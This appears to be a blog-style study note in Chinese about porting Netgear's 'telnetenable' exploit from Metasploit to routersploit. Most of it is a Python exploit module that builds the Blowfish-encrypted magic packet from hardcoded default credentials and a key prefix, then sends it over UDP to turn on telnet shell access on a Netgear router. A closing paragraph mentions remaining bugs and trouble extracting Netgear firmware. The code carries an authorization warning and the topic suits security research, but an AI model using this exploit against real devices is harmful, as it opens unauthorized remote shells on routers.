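# PoC on Routersploit

要自己import一個poc,所以我就上一下metasploit trace了一下code,然後希望可以把本來寫在metasploit的東西寫在routersploit的架構上。

先來看一下我參考之後寫的code:

```python
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
import socket
from Crypto.Cipher import Blowfish
from Crypto.Hash import MD5

# Netgear listens for the "telnet enable" magic packet on the telnet port itself.
TELNET_PORT = 23


class Exploit(HTTPClient):
    """Netgear "telnetenable" PoC, ported from the Metasploit module to routersploit.

    The device accepts a "magic" packet on its telnet port that switches the
    telnet daemon on.  The packet is built as follows (see ``_build_payload``):

        cleartext = MAC(0x10) || username(0x10) || password(0x21), zero-padded to 0x70
        block     = MD5(cleartext) || cleartext, zero-padded to 0x80
        payload   = swap32(Blowfish_ECB(key="AMBIT_TELNET_ENABLE+" + password, swap32(block)))

    where ``swap32`` reverses the byte order of every 32-bit word.

    This turns on a remote shell service on the target.  Only run it against
    devices you are authorized to test.
    """

    __info__ = {
        "name": "test",
        "description": "test test",
        "authors": "Aihcer",
        "devices": "Netgear系列",
    }

    # NOTE(review): routersploit's HTTPClient helpers (http_request etc.) read
    # ``self.target``/``self.port``; this module names the host option ``ip`` and
    # only uses the raw UDP socket below, so those helpers are not usable as-is.
    ip = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(TELNET_PORT, "Target telnet port")
    username = OptString("Gearguy", "Username to login")
    password = OptString("Geardog", "Password to login")
    # The MAC is part of the signed cleartext.  The default is a placeholder;
    # presumably it has to be the target's LAN MAC for the device to accept the
    # packet — confirm before use.
    mac = OptString("00:40:5E:21:14:4E", "Target LAN MAC address (AA:BB:CC:DD:EE:FF)")

    def run(self):
        """Build the telnet-enable packet from the options and send it to ``ip:port``."""
        try:
            payload = self._build_payload(self.mac, self.username, self.password)
        except ValueError as err:
            print("Invalid option: %s" % err)
            return
        self._send_payload(self.ip, self.port, payload)

    @staticmethod
    def _byteswap32(data):
        """Reverse the byte order of every 32-bit word in *data*.

        Replaces the ``array('i')``/``array('L')`` + ``byteswap()`` trick of the
        original script, which depended on the platform's C int size.

        Raises:
            ValueError: if ``len(data)`` is not a multiple of 4 (both callers
                pass 0x80 bytes).
        """
        if len(data) % 4:
            raise ValueError("data length must be a multiple of 4")
        return b"".join(data[i:i + 4][::-1] for i in range(0, len(data), 4))

    @classmethod
    def _build_payload(cls, mac, username, password):
        """Return the encrypted telnet-enable packet as bytes.

        Args:
            mac: target MAC, with or without ``:``/``-`` separators.
            username: telnet username (at most 0x10 bytes).
            password: telnet password (at most 0x21 bytes); also keys the cipher.

        Raises:
            ValueError: if any field exceeds the fixed-width slot it is packed
                into.  The original used ``assert``, which is stripped under
                ``python -O`` and would then silently produce a corrupt packet.
        """
        mac_bytes = mac.replace(":", "").replace("-", "").upper().encode()
        user_bytes = username.encode()
        pass_bytes = password.encode()

        if len(mac_bytes) >= 0x10:
            raise ValueError("MAC address must be shorter than 16 characters")
        if len(user_bytes) > 0x10:
            raise ValueError("username must be at most 16 bytes")
        if len(pass_bytes) > 0x21:
            raise ValueError("password must be at most 33 bytes")

        # Fixed-width, NUL-padded fields, exactly as the device expects them.
        cleartext = (
            mac_bytes.ljust(0x10, b"\x00")
            + user_bytes.ljust(0x10, b"\x00")
            + pass_bytes.ljust(0x21, b"\x00")
        ).ljust(0x70, b"\x00")

        digest = MD5.new(cleartext).digest()
        block = cls._byteswap32((digest + cleartext).ljust(0x80, b"\x00"))

        # Key is 20 + len(password) bytes, which stays inside Blowfish's
        # 4..56-byte key range given the password bound above.
        key = b"AMBIT_TELNET_ENABLE+" + pass_bytes
        cipher = Blowfish.new(key, Blowfish.MODE_ECB)  # original passed mode literal 1 (= ECB)
        return cls._byteswap32(cipher.encrypt(block))

    @staticmethod
    def _send_payload(host, port, payload):
        """Send *payload* as one UDP datagram to ``host:port``.

        Tries every IPv4 address resolved for *host* until one socket can be
        created and written to.  Returns True if the datagram was sent, False
        otherwise (resolution failure or no usable address); failures are
        printed rather than raised so the framework's run loop is not aborted.
        """
        try:
            addrs = socket.getaddrinfo(host, port, socket.AF_INET,
                                       socket.SOCK_DGRAM, socket.IPPROTO_IP)
        except socket.gaierror as err:
            print("Could not resolve '%s': %s" % (host, err))
            return False

        for af, socktype, proto, _canonname, sa in addrs:
            try:
                with socket.socket(af, socktype, proto) as sock:
                    sock.connect(sa)
                    sock.send(payload)
            except OSError:
                continue
            print("Sent telnet enable payload to '%s:%d'" % (host, port))
            return True

        print("Could not connect to '%s:%d'" % (host, port))
        return False

    def execute(self, cmd):
        """Placeholder: command execution is not implemented in this PoC.

        The module only sends the telnet-enable packet; talking to the telnet
        service afterwards still has to be done by hand.
        """
        print("execute")
```

基本上還有一些bug,但是大致上是這樣,我再把他們修一下,應該就可以run起來了,然後其中有一些routersploit這個framework提供的功能我還沒有搞懂他們之間的api是怎麼用,接下來這個禮拜想要再追追看。

然後也可以提一下,netgear的firmware我有一點搞不定,他們給的chk檔好像是更新檔,所以不是一整個完整的firmware,這樣的話在extract的時候就沒有辦法拿到所有想要的東西。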